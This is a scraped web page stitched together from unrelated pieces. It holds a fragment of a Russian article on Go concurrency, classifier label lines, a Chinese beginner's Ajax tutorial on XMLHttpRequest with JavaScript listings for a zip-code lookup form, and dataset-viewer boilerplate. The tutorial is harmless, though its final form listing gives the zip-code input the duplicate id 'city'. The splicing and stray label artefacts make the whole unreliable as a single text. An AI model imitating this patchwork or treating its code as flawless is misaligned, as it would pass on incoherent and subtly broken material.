Lastly, the reason you are not seeing an explicit monetary value check in the mempool addition is because the amounts are Confidential Transactions (RingCT) - the amounts are masked. If you continue down in add_tx method, you'll find various other calls to blockchain.cpp to check the inputs and outputs of a tx. With RingCT, one of the checks needed is on the range proof: bulletproof_VERIFY. This ensures all inputs minus all outputs in the tx is within a range and positive. If you search back through the code from there, you'll find various places that call through to that check, such as core::handle_incoming_tx_accumulated_batch
| improve this answer | |
• I thought the rangeproof just ensured that the outputs were within a certain range, and had nothing to do with the inputs? – WeCanBeFriends Apr 20 '19 at 13:10
• Inputs and outputs are used in the range proof. You need to know money is not being created out of thin air and you need to ensure the sum of all inputs minus the sum of all outputs is positive (or zero). See this answer. – jtgrassie Apr 20 '19 at 15:54
• If I understand: ProveRange(Sum(in)-Sum(out)) ? I was understand the impression that there was a rangeproof for each output, so the output amount could not be negative. Is there a link or article on this? – WeCanBeFriends Apr 20 '19 at 16:43
• The proof proves that each committed value is positive and the sum of all inputs minus the sum of all outputs is greater-than or equal to 0. See Zero to Monero sections 4.2 & 4.3. – jtgrassie Apr 20 '19 at 17:47
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.971232 |
Each column in a worksheet contains the data for one variable. You can customize columns in various ways. You can name them, write descriptions of them, change fonts, resize them, hide unused columns, and more.
Insert a column
• To insert one column, click in the worksheet where you want to insert the column, then right-click and choose Insert Columns.
• To insert multiple columns, select one or more cells in the number of columns equal to the number that you want to insert, then right-click and choose Insert Columns.
Columns are inserted to the left of the selected columns.
Name a column
To enter or change a column name, click in the column name cell (below the column number cell) and type the name. A column name must follow these rules:
• It cannot be more than 31 characters.
• It cannot begin with an asterisk (*).
• It cannot contain the symbols ' or #.
• It cannot have the same name as a different column in the same worksheet.
Enter a column description
A column with a description has a red triangle in the upper right corner of the column name cell.
• To enter a column description, click in the column, then right-click and choose Column Properties > Description.
• To view the description of the column, hold the pointer over the red triangle in the corner of the column name cell.
Move columns
Complete the following steps to move columns to a different location in the worksheet.
1. Select one or more columns to move, then right-click and choose Move Columns.
2. Select one of the following:
• Before column C1: Put the selected columns before C1 (pushing other columns to the right).
• After last column in use: Put the selected columns after the last non-empty column.
• Before column: Put the selected columns before the column that you select.
3. Click OK.
Copy columns to columns
Complete the following steps to copy columns in the active worksheet to columns in a specified worksheet.
1. Choose Data > Copy > Columns to Columns.
2. In Copy from columns, enter the columns to copy.
3. From Store Copied Data in Columns, select a storage option:
• In new worksheet: Enter a name for the new worksheet (optional).
• In following worksheet, after last column used: Enter the name of an open worksheet to copy the columns to.
• In current worksheet, in columns: Enter one or more target columns.
4. To include column names, select Name the columns containing the copied data.
5. To specify the rows to include or exclude in the new columns, click Subset the Data and do the following:
1. Under Include or Exclude, specify whether to include or exclude rows from the copied columns.
2. From Specify Which Rows To Include/Specify Which Rows To Exclude, select one of the following:
• All rows/No rows: Include all rows or exclude no rows.
• Rows that match: Include or exclude rows that match a condition. Click Condition to enter the conditional expression.
• Brushed rows: Include or exclude rows that correspond to brushed points on a graph.
• Row numbers: Include or exclude the specified rows. Enter individual row numbers and ranges of row numbers. Use a colon (:) to denote an inclusive range. For example, enter 1 4 6:10 to signify the set 1, 4, 6, 7, 8, 9, 10.
6. Click OK in each dialog box.
Change column widths
There are several ways to change column widths.
Manually change the width of one or more columns
• To resize one column, hold the pointer over the right edge of the column number cell. Then, drag the two-sided arrow to the desired width.
• To resize multiple adjacent columns at the same time, select one or more cells in each of the columns, then hold the pointer on the right edge of any of the column number cells. Drag the two-sided arrow to the desired width. When you release the mouse button, the columns change size.
Set the width of all columns in the active worksheet
1. Click in the worksheet, then right-click and choose Column Properties > Standard Width.
2. In Standard column width, enter the number of characters to display (between 1 and 80).
3. To include columns whose widths were changed manually, select Change widths that were set individually.
4. Click OK.
Specify automatic widening or set a fixed width for selected columns
1. Drag to select the columns, then right-click and choose Column Properties > Width.
2. Select one of the following:
• Automatic widening: Minitab determines the column width by the width and format of the data in the column.
• Fixed width: Enter the exact width that you want the columns to be (up to 80 characters). To hide the columns, enter 0.
3. Click OK.
Change Minitab's default column width
Complete the following steps to change the standard column width for all new worksheets.
1. Choose File > Options > Worksheets > General.
2. In Column width, enter the number of characters to display (between 1 and 80).
3. Click OK.
Hide and unhide columns
There are several ways to hide or unhide columns in the active worksheet.
Hide selected columns
Do one of the following:
• Select one or more cells in the columns that you want to hide, then right-click and choose Column Properties > Hide Selected Columns.
• Hold the pointer over the right edge of the column number cell, then drag the two-sided arrow to the left until the column disappears.
Unhide selected columns
Select the two columns that surround the hidden columns, then right-click and choose Column Properties > Unhide Selected Columns.
Hide/unhide columns
You can manage the display of all columns in the worksheet.
Tip
To show or hide hidden columns in dialog boxes, click in the column, then right-click and choose Column Properties > Use Hidden Columns in Dialog Boxes.
1. Click in the column, then right-click and choose Column Properties > Hide/Unhide Columns.
2. From Columns to display in list boxes, select the columns that you want to hide or unhide:
• All Columns: Display all columns in the worksheet that contain data, including columns that were previously hidden, and any empty columns that are between the data columns.
• Data Columns: Display only columns that contain data.
• Empty Columns: Display only empty columns that are between columns that contain data.
3. Use the arrow buttons to move the columns between Unhidden Columns and Hidden Columns.
4. Click OK.
Sort columns
• To sort an entire worksheet by values in the selected column, such as a date column, click in the column, then right-click and choose Sort Columns > Entire Worksheet.
• To sort by more than one column or to sort only specified columns, click in the worksheet, then right-click and choose Sort Columns > Custom Sort.
By using this site you agree to the use of cookies for analytics and personalized content. Read our policy
|
__label__pos
| 0.934771 |
How to know if a phone number is on Telegram?
Home › Uncategorized › How to know if a phone number is on Telegram?
How to know if a phone number is on Telegram?
If you want to easily check, and without having to add contacts to our phonebook, if a specific number uses Telegram, we can do it very easily using a free and open source application called TLChecker. We enter the phone number, with our corresponding prefix (+34666555444) and we will click on the "Check" button so that the program checks whether said number is registered on Telegram or not.
Please enable JavaScript
How to know if a number is registered on Telegram?
This is how you can do it: Open Telegram for the first time and enter the phone number with which you are going to register. Enter the verification code that Telegram sent you by SMS to confirm that the number belongs to you.
How to know a person's phone number on Telegram?
No. Neither party will see the other's phone number (unless you've allowed it in your privacy settings). It is a similar case to what happens when you send a message to a person you just met in a Telegram group.
How to search for a person on Telegram without a phone number?
Create a username so you don't give out your number. It will be enough to search for that username so that another person can find you in the application, so it will no longer be necessary to give them your phone number.
How to search for a person on Telegram without a phone number?
Create a username so you don't give out your number. It will be enough to search for that username so that another person can find you in the application, so it will no longer be necessary to give them your phone number.
Why do unknown contacts appear on Telegram?
Contacts between Google and Telegram can be synchronized. A failure in the Telegram synchronization procedure causes contacts to appear in the app that have already been deleted.
How to know the IP of a Telegram message?
Telegram, when making calls, uses a protocol called Stun. This protocol makes it possible for NAT clients to find your public IP address. If we want to find out the other person's IP, it would be enough to launch Wireshark and call our victim.
How do you add a contact on Telegram?
You should know that you can add contacts on Telegram, even if they are not in your calendar. To do this, simply add any user using the instant messaging application and you will see that said contact appears in Telegram even if it is not registered on your mobile phone.
What is the difference between Telegram and WhatsApp?
In conclusion, Telegram is an instant messaging app that offers more functions than WhatsApp and more security mechanisms as long as they are activated correctly. However, WhatsApp is more used and as long as it remains that way, it will have an important competitive advantage over other platforms.
How do you send a private message on Telegram?
Step 1: Click on the pencil-shaped icon, located at the bottom right of the screen. Step 2: Find the person you want to send the message to and tap their name.
How to see all a person's messages on Telegram?
First you have to click on the name of the person you are talking to or the group you are in, and you will enter the file for that conversation. Inside, click on the Search option that will appear among the multiple options.
How to know who has viewed your Telegram profile?
It is not possible, only the creator/administrator of the channel could see who the subscribers are.
How do secret Telegram messages work?
The secret (or private) chat has big differences from a normal chat on Telegram. First of all, the key is that the messages from secret conversations can only be read by you and the recipient, while those from the rest of the conversations are stored in the cloud and Telegram can decrypt them.
How to search for a person on Telegram without a phone number?
Create a username so you don't give out your number. It will be enough to search for that username so that another person can find you in the application, so it will no longer be necessary to give them your phone number.
Who can see me on Telegram?
When you are in the settings center, press the Privacy and security option. Privacy: Here you can choose your contacts who can see everything from your phone number to your profile photo. You will also be able to specify who will see your last time in the app and your online status.
How to know who visits your Telegram profile?
It is not possible, only the creator/administrator of the channel could see who the subscribers are.
Who can find you on Telegram?
With this, only the people you have in your contact list will be able to find you using your phone number. Below you can add exceptions. But the most normal thing is that you also have your contacts linked in the app.
How to get the phone number of an Instagram account?
It is impossible to know the person's number if they do not decide to share it since it would be a violation of Instagram's privacy policies if they decide to share it; It may be through a private message (DM) or “CONTACT” appears in their profile. If you enter that option you will be able to obtain their phone number.
How to track the location of a phone number?
To find out the location of a cell phone with its phone number, you can use a location service such as mSpy, Scannero or tracenumero.com. These applications allow you to track the exact location of a device in real time.
How to find someone with IP address?
IPLocation is a free online tool that will allow you to view the geographic location of any IP address. All you have to do is access the website, enter the IP address and the tool will show you the position on a map with the coordinates, country, region and city.
Where are Telegram contacts saved?
Contacts on Telegram work in a similar way to WhatsApp: they are synchronized with the contacts on your mobile phone, although they have the peculiarity that in this case the synchronized contacts are stored in the Telegram cloud.
How secure and private is Telegram?
Telegram secret chats use end-to-end encryption, respect user privacy, and operate independently.
What is special about Telegram?
They have send and read confirmation options; They feature support for calls, video calls and voice messages; They allow you to share images, videos and documents; 2-step verification as a security method.
What advantages does Telegram have?
It allows you to send files from your mobile to the PC and vice versa, it becomes an audio player, it helps you compress photos, create GIF images and even create your own minimalist blog. In addition, we will also include some settings dedicated to privacy and better managing your groups and conversations.
How to know if your partner has Telegram?
Another way to see who among your contacts is on Telegram is to use the side panel and tap Contacts. You will then see the list of your contacts who already have Telegram.
What kind of people use Telegram?
How can I see my phone number on Telegram?
This means we can't actually help you unless you have access to the phone number or Telegram on any of your devices. Go to Telegram Settings > Privacy and security and activate two-step verification. This way, the phone number alone will not be enough to log you in.
How to know if a phone number uses Telegram?
Without a doubt, TLChecker is a very simple and easy-to-use application that allows us, in seconds, to check whether a phone number uses Telegram or not directly from our computer, something that, with WhatsApp, for example, is not possible.
How to choose all contacts who do not use Telegram?
Once the above is done, the list of your contacts who do not yet use Telegram will automatically appear and there, you can choose as many as you want. After selecting each and every one of the contacts you want, just press the button that says “Invite to Telegram” and, at the same time, indicates the total number of people chosen.
How to use username on Telegram?
Q: What can I use as a username? You can use az, 0-9 and underscores. Usernames are not case-sensitive, but Telegram will store your preferences for this (for example, Telegram or TeleGram is the same user).
Randomly suggested related videos:
How To Know Telegram User Phone Number (2023)
In this video I show you how to know telegram user phone number in 2023.Do you want to know telegram user phone number in 2023? Yes? Perfect.I show you how t…
No Comments
Leave a Reply
Your email address will not be published. Required fields are marked *
|
__label__pos
| 0.998638 |
Posted on
UIView及繪圖練習範例APP
作業目標:Youtube操作影片
練習原始碼:homework0803
這個作業主要是在練習對view以及簡單的繪圖的操作,還有timer的使用
因此我截錄一些我覺得是練習關鍵的程式碼
下面的是viewController的相關程式碼
一個個出現的程式碼,按下show按鈕時觸發
- (IBAction)showButtonClick {
[self clearButtonClick];
[self.circleNumber resignFirstResponder];
total = [self.circleNumber.text integerValue];
index = 0;
//設定間隔一個個產生circle
[NSTimer scheduledTimerWithTimeInterval:1 target:self selector:@selector(addItems:) userInfo:NULL repeats:YES];
}
取得圓圈排列坐標的程式碼,傳入值為圓半徑及角度
//取得坐標
- (CGPoint)getPoint:(int) radius withAngel:(CGFloat) degrees{
int y = sin(degrees * M_PI / 180)*radius;
int x = cos(degrees * M_PI / 180)*radius;
CGPoint btCorner = CGPointMake(x, y) ;
return btCorner;
}
下面的程式碼則是在被新增的UIView物件裡面
顯示動畫,這邊要注意的是因為定位點的關係,由於我們希望元件的縮放是以view的中心來做縮放
所以改變的值是self.bounds,一般我們在做元件內部繪圖事件,都會使用self.bounds
而self.frame則是在外部設定物件資訊時使用。
-(void) playAnimation{
[UIView animateWithDuration:0.5f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 50, 50);
}completion:^(BOOL finished) {
[UIView animateWithDuration:0.5f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 30, 30);
}completion:^(BOOL finished) {
}];
}];
}
另外,因為- (id)initWithFrame:(CGRect)frame被呼叫的時間是在circle被新建的時後,而不是在被加到畫面時,
為了落實動畫的被執行時間,所以我又實作了layoutSubviews這個方法,
並加上BOOL init當今天是第一次被呼叫時,才會執行playAnimation
-(void)layoutSubviews{
if(init){
[self playAnimation];
init = NO;
}
}
然後實作按下後縮小離開時恢復大小的功能
-(void) touchesBegan:(NSSet *)touches withEvent:(UIEvent *)event{
[UIView animateWithDuration:0.2f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 0, 0);
}
completion:^(BOOL finished) {
}];
}
-(void) touchesEnded:(NSSet *)touches withEvent:(UIEvent *)event{
[UIView animateWithDuration:0.2f
animations:^{
self.bounds = CGRectMake(self.bounds.origin.x, self.bounds.origin.y, 30, 30);
}
completion:^(BOOL finished) {
}];
}
原始碼下載:homework0803
|
__label__pos
| 0.991154 |
What is the function of a sound card?
The evolution of technology has paved the way for remarkable advancements in the world of audio. From the simple beeps and boops of early computers to the immersive surround sound experience we enjoy today, sound has become an indispensable part of our lives. At the heart of this audio revolution lies a crucial piece of hardware known as the sound card. So, what is the function of a sound card? Let’s delve into this fascinating subject and explore the various roles it plays in enhancing our auditory experience.
**What is the function of a sound card?**
The primary function of a sound card is to process and convert digital or analog audio into a format that can be played through speakers or headphones. It acts as an intermediary between your computer’s software and its audio hardware, enabling your system to produce sound in a wide range of formats and qualities. In simpler terms, a sound card turns computer data into audible sound.
What are the different types of sound cards?
1. Integrated Sound Cards: These are built-in sound cards that come pre-installed on motherboards. They are typically capable of basic audio functions and cater to average users.
2. Dedicated Sound Cards: Designed for audiophiles and professionals, dedicated sound cards offer superior audio quality and advanced features for tasks like music production and gaming.
What are the components of a sound card?
3. Digital-to-Analog Converter (DAC): This component converts digital audio signals into analog signals that can be played through speakers or headphones.
4. Analog-to-Digital Converter (ADC): As the name suggests, the ADC converts analog audio signals into digital signals, allowing them to be processed by the computer.
5. Audio Processor: Responsible for tasks such as audio mixing, effects processing, and audio enhancement, the audio processor plays a vital role in enhancing sound quality.
Can a sound card improve audio quality?
6. Yes, a dedicated sound card can vastly improve audio quality by reducing interference and noise, providing higher sampling rates, and offering enhanced audio processing capabilities.
7. However, it’s important to note that the improvement in audio quality may not be noticeable on lower-end speakers or headphones, so the overall setup should be taken into consideration.
What other features do sound cards offer?
8. Multiple Channel Support: Sound cards can support various audio channels, including stereo, 5.1 surround sound, and even 7.1 surround sound setups, delivering a more immersive audio experience.
9. Microphone Input: Sound cards often include microphone inputs, enabling users to connect external microphones for voice recording or communication purposes.
10. MIDI Support: Many sound cards offer MIDI (Musical Instrument Digital Interface) support, allowing users to connect MIDI instruments such as keyboards and controllers directly to their computer.
Can a sound card offload CPU usage?
11. Yes, a dedicated sound card can offload audio processing tasks from the CPU, leading to better overall system performance, especially during intensive audio tasks like gaming or music production.
12. By shifting the audio workload to a specialized hardware component, the CPU is freed up to handle other tasks, resulting in smoother performance and better frame rates.
Are sound cards necessary for all computers?
13. Integrated sound cards are generally sufficient for everyday computer usage, such as web browsing, multimedia playback, and casual gaming.
14. However, if you require high-quality audio output, advanced audio processing, or if you are an audio professional or enthusiastic gamer, investing in a dedicated sound card can greatly enhance your experience.
Do laptops have sound cards?
15. Yes, laptops have integrated sound cards built into their motherboards. While they may not match the audio quality and performance of dedicated sound cards, they are perfectly suitable for most laptop users.
Can I upgrade my sound card?
16. Upgrading sound cards is possible in desktop computers. You can purchase a dedicated sound card and install it into an available PCIe slot on your motherboard. However, laptop users generally do not have the option for sound card upgrades.
Why do some sound cards have multiple ports?
17. Sound cards with multiple ports allow for greater versatility in connecting various audio devices simultaneously. This is particularly useful for users who require multiple audio inputs and outputs, such as musicians or audio engineers.
Do sound cards support surround sound?
18. Yes, sound cards are instrumental in delivering surround sound experiences. They process audio data from multiple channels and distribute them to the corresponding speakers in a surround sound setup, creating an immersive soundstage.
Is the quality of my sound card limited by my speakers?
19. While sound cards play a crucial role in audio quality, they are not solely responsible for the overall audio experience. The quality of speakers or headphones used in conjunction with a sound card also greatly influences the final sound output.
In conclusion, the function of a sound card is to bridge the gap between digital audio data and audible sound. Whether you’re a music enthusiast, gamer, or professional, a reliable sound card can greatly enhance your audio experience by offering improved audio quality, advanced audio processing features, and support for various audio setups. So, the next time you dive into your favorite playlist or engage in an intense gaming session, take a moment to appreciate the vital role of the humble sound card in making it all possible.
Leave a Comment
Your email address will not be published. Required fields are marked *
Scroll to Top
|
__label__pos
| 1 |
How to use Mattermost to create Microsoft Sharepoint sites and others
Some of my prospects have a fairly large Sharepoint implementation and usage. This is why some of them ask if it’s possible to run a task in Sharepoint or other tools from Mattermost. Because Mattermost supports so called WebSocket connections it’s fairly easy to integrate Mattermost events with different other tools. In a case the question was: “How can I create a Sharepoint site every time a channel in Mattermost ist created?”
Let me give you a bit background first… The Mattermost WebSocket API allows you to capture events based on a secure (if enabled) WebSocket connection and has different drivers already available: https://api.mattermost.com/
After you managed the authentication challenge you can use the token to authenticate against your Mattermost installation. I just started the script on my Mac and connect to my Mattermost server using a websocket (ws) driver. My websocket.js script is written in JavaScript as it seemed to be a natural way to connect to a React.js based frontend.
const WebSocket = require('ws');
var ws = new WebSocket("ws://192.168.0.15:8065/api/v4/websocket");
ws.on('open', function open(){
var msg = {
"seq": 1,
"action": "authentication_challenge",
"data": {
"token": "YOUR TOKEN HERE"
}
};
ws.send(JSON.stringify(msg));
});
ws.onmessage = function (event) {
var sortedKeys = Object.keys(event).sort();;
var obj = JSON.parse(event.data);
console.log(event.data);
if(obj.event == "channel_created"){
console.log("New channel created...")
ExternalCall();
}
else if (obj.event == "channel_viewed") {
console.log("Channel was viewed...")
}
}
function ExternalCall() {
var XMLHttpRequest = require("xmlhttprequest").XMLHttpRequest;
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
console.log("State: " + this.readyState);
if (this.readyState === 4) {
console.log("Complete.\nBody length: " + this.responseText.length);
console.log("Body:\n" + this.responseText);
}
};
xhttp.open("POST", "https://httpbin.org/post");
xhttp.send();
}
As you can see the script is very easy. It opens a new WebSocket connection and uses the token to authenticate against the Mattermost server. Now the script listens to the events happening on the server and parses them as JSON. As soon as an event matches `channel_created` or `channel_viewed` a log output is created.
While this output is just informal you can add the creation call for Sharepoint or some other tools or APIs right here. I added a small REST API call (ExternalCall) to a public API to demonstrate the use-case a bit better. You can easily use the information like team_id or user_id that was provided when creating the channel to gather more information to send to the external system.
Leave a Reply
|
__label__pos
| 0.85131 |
Перейти к курсу: Массивы и фрагменты
В этом уроке мы узнаем о массивах и срезах в Go.
Массивы
Что же такое массив?
Массив — это коллекция элементов фиксированного размера одного типа. Элементы массива хранятся последовательно, и доступ к ним можно получить по их index.
Объявление
Мы можем объявить массив следующим образом:
var a [n]T
Войти в полноэкранный режим Выйти из полноэкранного режима
Здесь n — это длина, а T может быть любым типом, например, целым числом, строкой или пользовательской структурой.
Теперь объявим массив целых чисел длиной 4 и выведем его на печать.
func main() {
var arr [4]int
fmt.Println(arr)
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
[0 0 0 0]
Войти в полноэкранный режим Выйти из полноэкранного режима
По умолчанию все элементы массива инициализируются нулевым значением соответствующего типа массива.
Инициализация
Мы также можем инициализировать массив с помощью литерала массива.
var a [n]T = [n]T{V1, V2, ... Vn}
Вход в полноэкранный режим Выход из полноэкранного режима
func main() {
var arr = [4]int{1, 2, 3, 4}
fmt.Println(arr)
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
[1 2 3 4]
Войти в полноэкранный режим Выход из полноэкранного режима
Мы можем даже сделать сокращенное объявление.
...
arr := [4]int{1, 2, 3, 4}
Ввести полноэкранный режим Выход из полноэкранного режима
Доступ к
Как и в других языках, мы можем получить доступ к элементам, используя index, поскольку они хранятся последовательно.
func main() {
arr := [4]int{1, 2, 3, 4}
fmt.Println(arr[0])
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
1
Войти в полноэкранный режим Выход из полноэкранного режима
Итерация
Теперь поговорим об итерации.
Итак, существует несколько способов итерации массивов.
Первый — это использование цикла for с функцией len, которая выдает нам длину массива.
func main() {
arr := [4]int{1, 2, 3, 4}
for i := 0; i < len(arr); i++ {
fmt.Printf("Index: %d, Element: %dn", i, arr[i])
}
}
Вход в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
Index: 0, Element: 1
Index: 1, Element: 2
Index: 2, Element: 3
Index: 3, Element: 4
Войти в полноэкранный режим Выход из полноэкранного режима
Другой способ — использовать ключевое слово range с циклом for.
func main() {
arr := [4]int{1, 2, 3, 4}
for i, e := range arr {
fmt.Printf("Index: %d, Element: %dn", i, e)
}
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
Index: 0, Element: 1
Index: 1, Element: 2
Index: 2, Element: 3
Index: 3, Element: 4
Войти в полноэкранный режим Выход из полноэкранного режима
Как мы видим, наш пример работает так же, как и раньше.
Но ключевое слово range является довольно универсальным и может быть использовано несколькими способами.
for i, e := range arr {} // Normal usage of range
for _, e := range arr {} // Omit index with _ and use element
for i := range arr {} // Use index only
for range arr {} // Simply loop over the array
Войти в полноэкранный режим Выход из полноэкранного режима
Многомерность
Все массивы, которые мы создали до сих пор, являются одномерными. Мы также можем создавать многомерные массивы в Go.
Давайте рассмотрим пример:
func main() {
arr := [2][4]int{
{1, 2, 3, 4},
{5, 6, 7, 8},
}
for i, e := range arr {
fmt.Printf("Index: %d, Element: %dn", i, e)
}
}
Вход в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
Index: 0, Element: [1 2 3 4]
Index: 1, Element: [5 6 7 8]
Войти в полноэкранный режим Выход из полноэкранного режима
Мы также можем позволить компилятору вывести длину массива, используя вместо длины ... многоточие.
func main() {
arr := [...][4]int{
{1, 2, 3, 4},
{5, 6, 7, 8},
}
for i, e := range arr {
fmt.Printf("Index: %d, Element: %dn", i, e)
}
}
Вход в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
Index: 0, Element: [1 2 3 4]
Index: 1, Element: [5 6 7 8]
Войти в полноэкранный режим Выход из полноэкранного режима
Свойства
Теперь поговорим о некоторых свойствах массивов.
Длина массива является частью его типа. Так, массивы a и b являются совершенно разными типами, и мы не можем присвоить один другому.
Это также означает, что мы не можем изменить размер массива, поскольку изменение размера массива означает изменение его типа.
package main
func main() {
var a = [4]int{1, 2, 3, 4}
var b [2]int = a // Error, cannot use a (type [4]int) as type [2]int in assignment
}
Вход в полноэкранный режим Выход из полноэкранного режима
Массивы в Go являются типами значений, в отличие от других языков, таких как C, C++ и Java, где массивы являются ссылочными типами.
Это означает, что когда мы присваиваем массив новой переменной или передаем массив в функцию, копируется весь массив.
Таким образом, если мы вносим какие-либо изменения в этот скопированный массив, исходный массив не будет затронут и останется неизменным.
package main
import "fmt"
func main() {
var a = [7]string{"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}
var b = a // Copy of a is assigned to b
b[0] = "Monday"
fmt.Println(a) // Output: [Mon Tue Wed Thu Fri Sat Sun]
fmt.Println(b) // Output: [Monday Tue Wed Thu Fri Sat Sun]
}
Вход в полноэкранный режим Выход из полноэкранного режима
Слайсы
Я знаю, о чем вы думаете: массивы полезны, но немного негибки из-за ограничений, вызванных их фиксированным размером.
Это приводит нас к Slice, так что же такое срез?
Слайс — это сегмент массива. Слайсы основываются на массивах и обеспечивают большую мощность, гибкость и удобство.
Слайс состоит из трех частей:
• Указатель на базовый массив.
• Длина сегмента массива, который содержит фрагмент.
• И емкости, которая представляет собой максимальный размер, до которого может вырасти сегмент.
Подобно функции len, мы можем определить емкость фрагмента с помощью встроенной функции cap. Вот пример:
package main
import "fmt"
func main() {
a := [5]int{20, 15, 5, 30, 25}
s := a[1:4]
// Output: Array: [20 15 5 30 25], Length: 5, Capacity: 5
fmt.Printf("Array: %v, Length: %d, Capacity: %dn", a, len(a), cap(a))
// Output: Slice [15 5 30], Length: 3, Capacity: 4
fmt.Printf("Slice: %v, Length: %d, Capacity: %d", s, len(s), cap(s))
}
Вход в полноэкранный режим Выход из полноэкранного режима
Не волнуйтесь, мы подробно обсудим все, что здесь показано.
Объявление
Давайте посмотрим, как мы можем объявить фрагмент.
var s []T
Вход в полноэкранный режим Выйти из полноэкранного режима
Как мы видим, нам не нужно указывать длину. Давайте объявим фрагмент целых чисел и посмотрим, как он работает.
func main() {
var s []string
fmt.Println(s)
fmt.Println(s == nil)
}
Вход в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
[]
true
Вход в полноэкранный режим Выход из полноэкранного режима
Итак, в отличие от массивов, нулевым значением среза является nil.
Инициализация
Существует несколько способов инициализации нашего среза. Один из способов — использовать встроенную функцию make.
make([]T, len, cap) []T
Вход в полноэкранный режим Выход из полноэкранного режима
func main() {
var s = make([]string, 0, 0)
fmt.Println(s)
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
[]
Вход в полноэкранный режим Выход из полноэкранного режима
Подобно массивам, мы можем использовать литерал slice для инициализации нашего среза.
func main() {
var s = []string{"Go", "TypeScript"}
fmt.Println(s)
}
Вход в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
[Go TypeScript]
Войти в полноэкранный режим Выход из полноэкранного режима
Другой способ — создать фрагмент из массива. Поскольку срез — это сегмент массива, мы можем создать срез от индекса low до high следующим образом.
a[low:high]
Войти в полноэкранный режим Выход из полноэкранного режима
func main() {
var a = [4]string{
"C++",
"Go",
"Java",
"TypeScript",
}
s1 := a[0:2] // Select from 0 to 2
s2 := a[:3] // Select first 3
s3 := a[2:] // Select last 2
fmt.Println("Array:", a)
fmt.Println("Slice 1:", s1)
fmt.Println("Slice 2:", s2)
fmt.Println("Slice 3:", s3)
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
Array: [C++ Go Java TypeScript]
Slice 1: [C++ Go]
Slice 2: [C++ Go Java]
Slice 3: [Java TypeScript]
Войти в полноэкранный режим Выход из полноэкранного режима
Отсутствие младшего индекса означает 0, а отсутствие старшего индекса означает len(a).
Здесь следует отметить, что мы можем создавать срезы из других срезов, а не только из массивов.
var a = []string{
"C++",
"Go",
"Java",
"TypeScript",
}
Вход в полноэкранный режим Выход из полноэкранного режима
Итерация
Мы можем выполнять итерацию по фрагменту так же, как и по массиву, используя цикл for с функцией len или ключевым словом range.
Функции
Итак, теперь поговорим о встроенных функциях для работы с фрагментами, предоставляемых в Go.
• copy
Функция copy() копирует элементы из одного фрагмента в другой. Она принимает 2 фрагмента, конечный и исходный. Она также возвращает количество скопированных элементов.
func copy(dst, src []T) int
Вход в полноэкранный режим Выход из полноэкранного режима
Давайте посмотрим, как мы можем ее использовать.
func main() {
s1 := []string{"a", "b", "c", "d"}
s2 := make([]string, len(s1))
e := copy(s2, s1)
fmt.Println("Src:", s1)
fmt.Println("Dst:", s2)
fmt.Println("Elements:", e)
}
Войти в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
Src: [a b c d]
Dst: [a b c d]
Elements: 4
Войти в полноэкранный режим Выход из полноэкранного режима
Как и ожидалось, наши 4 элемента из исходного фрагмента были скопированы в целевой фрагмент.
• добавление
Теперь давайте рассмотрим, как мы можем добавить данные в наш фрагмент с помощью встроенной функции append, которая добавляет новые элементы в конец заданного фрагмента.
Она принимает фрагмент и переменное количество аргументов. Затем она возвращает новый фрагмент, содержащий все элементы.
append(slice []T, elems ...T) []T
Вход в полноэкранный режим Выход из полноэкранного режима
Давайте попробуем это на примере, добавив элементы к нашему фрагменту.
func main() {
s1 := []string{"a", "b", "c", "d"}
s2 := append(s1, "e", "f")
fmt.Println("s1:", s1)
fmt.Println("s2:", s2)
}
Вход в полноэкранный режим Выход из полноэкранного режима
$ go run main.go
s1: [a b c d]
s2: [a b c d e f]
Войти в полноэкранный режим Выход из полноэкранного режима
Как мы видим, новые элементы были добавлены, и был возвращен новый фрагмент.
Но если данный фрагмент не имеет достаточной емкости для новых элементов, то выделяется новый базовый массив с большей емкостью.
Все элементы из базового массива существующего среза копируются в этот новый массив, а затем добавляются новые элементы.
Свойства
Наконец, давайте обсудим некоторые свойства срезов.
В отличие от массивов, срезы являются ссылочными типами.
Это означает, что изменение элементов фрагмента приведет к изменению соответствующих элементов в массиве, на который ссылается фрагмент.
package main
import "fmt"
func main() {
a := [7]string{"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}
s := a[0:2]
s[0] = "Sun"
fmt.Println(a) // Output: [Sun Tue Wed Thu Fri Sat Sun]
fmt.Println(s) // Output: [Sun Tue]
}
Вход в полноэкранный режим Выход из полноэкранного режима
Ломтики можно использовать и с переменными типами.
package main
import "fmt"
func main() {
values := []int{1, 2, 3}
sum := add(values...)
fmt.Println(sum)
}
func add(values ...int) int {
sum := 0
for _, v := range values {
sum += v
}
return sum
}
Вход в полноэкранный режим Выход из полноэкранного режима
Эта статья является частью моего открытого курса по Go, доступного на Github.
karanpratapsingh / go-course
Освойте основы и расширенные возможности языка программирования Go
Курс по Go
Привет, добро пожаловать на курс, и спасибо за изучение Go. Я надеюсь, что этот курс обеспечит вам отличный опыт обучения.
Этот курс также доступен на моем сайте, а также на Educative.io
Оглавление
• Начало работы
• Что такое Go?
• Зачем изучать Go?
• Установка и настройка
• Глава I
• Hello World
• Переменные и типы данных
• Форматирование строк
• Управление потоком данных
• Функции
• Модули
• Пакеты
• Рабочие пространства
• Полезные команды
• Сборка
• Глава II
• Указатели
• Структуры
• Методы
• Массивы и фрагменты
• Карты
• Глава III
• Интерфейсы
• Ошибки
• Паника и восстановление
• Тестирование
• Дженерики
• Глава IV
